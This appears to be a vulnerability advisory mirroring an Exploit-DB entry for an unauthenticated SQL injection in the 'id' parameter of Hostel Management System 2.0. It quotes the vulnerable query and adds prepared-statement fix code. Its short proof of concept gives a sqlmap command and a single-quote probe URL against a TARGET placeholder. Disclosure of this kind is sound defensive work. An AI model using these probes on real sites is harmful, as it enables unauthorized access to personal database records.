Vendor: Hostel Management System
Author: Selim Enes 'Enesdex' Karaduman
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Hostel Management System
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phpgurukul:hostel_management_system:2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 - Wamp Server
Year: 2020

Hostel Management System 2.0 – ‘id’ SQL Injection (Unauthenticated)

The value of the 'id' GET parameter in full-profile.php is concatenated directly into the SQL query, with no sanitisation or parameterisation, so an unauthenticated attacker can inject SQL. The flaw can be confirmed with sqlmap or simply by appending a single quote to the URL, which produces an SQL error.

Mitigation:

Input validation should be used to prevent SQL injection: every user-supplied value, including 'id', must be validated and filtered before it is used in an SQL query.
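The advisory's own line is the 'before' of the fix. The following is an added example, not the project's code, showing how that same query is written safely with a mysqli prepared statement so the request value is bound as data and can no longer alter the statement. It assumes, as the advisory's snippet does, that `$con` is an open mysqli connection and that the table `registration` and column `emailid` exist; the function names are hypothetical.

```php
<?php
// Added example (not the project's code). Rewrites the query from the
// advisory's vulnerable line in full-profile.php so that the value taken
// from the request is bound as a parameter instead of being concatenated
// into the SQL string. Assumes $con is an open mysqli connection.

/**
 * Look up one registration row by the value supplied in the request.
 * Table and column names come from the advisory; the bound parameter
 * replaces the concatenation of $_GET['id'].
 */
function lookupRegistrationByEmail(mysqli $con, string $emailid): ?array
{
    // The placeholder is part of the query text sent to the server once;
    // the value is transmitted separately and is never parsed as SQL.
    $stmt = $con->prepare("SELECT * FROM registration WHERE emailid = ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $con->error);
    }
    $stmt->bind_param('s', $emailid);   // 's' = bind as a string
    if (!$stmt->execute()) {
        $stmt->close();
        throw new RuntimeException('execute failed: ' . $con->error);
    }
    $result = $stmt->get_result();
    $row = $result ? $result->fetch_assoc() : null;
    $stmt->close();
    return $row ?: null;
}

/**
 * Input validation in front of the query, as the mitigation text asks for.
 * This is defence in depth, not a replacement for the prepared statement:
 * the column being compared is emailid, so anything that is not an
 * e-mail address is rejected before a query is issued. (Assumption: the
 * application really expects an e-mail address here; the advisory's PoC
 * passes a number, so adjust the filter to whatever the link actually
 * carries.)
 */
function validatedIdParam(array $query): ?string
{
    $id = $query['id'] ?? '';
    if (!is_string($id) || strlen($id) > 254) {
        return null;
    }
    return filter_var($id, FILTER_VALIDATE_EMAIL) === false ? null : $id;
}

// Hypothetical replacement for the vulnerable line in full-profile.php:
//
//   $emailid = validatedIdParam($_GET);
//   if ($emailid === null) {
//       http_response_code(400);
//       exit('invalid id');
//   }
//   $profile = lookupRegistrationByEmail($con, $emailid);
//
// With this in place the single-quote probe from the advisory is either
// rejected by the validator or, if the validator is loosened, bound as a
// literal string and matched against the column rather than executed.
```

The prepared statement is what actually closes the injection; the validator only narrows the accepted values and gives a clean 400 instead of a database error, which also removes the error-based signal the advisory's single-quote test relies on.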

Exploit-DB raw data:

# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)
# Date: 2020-06-02
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210
# Version: 2.0
# Tested on: Windows 10 - Wamp Server

--Vulnerable file /full-profile.php

--Vulnerable code:
    $ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'");

    The id parameter's value goes into the SQL query directly!

--Proof Of Concept

   sqlmap -u "http://TARGET/hostel/full-profile.php?id=6"
   OR
   http://TARGET/hostel/full-profile.php?id=6' A single quote will cause an SQL error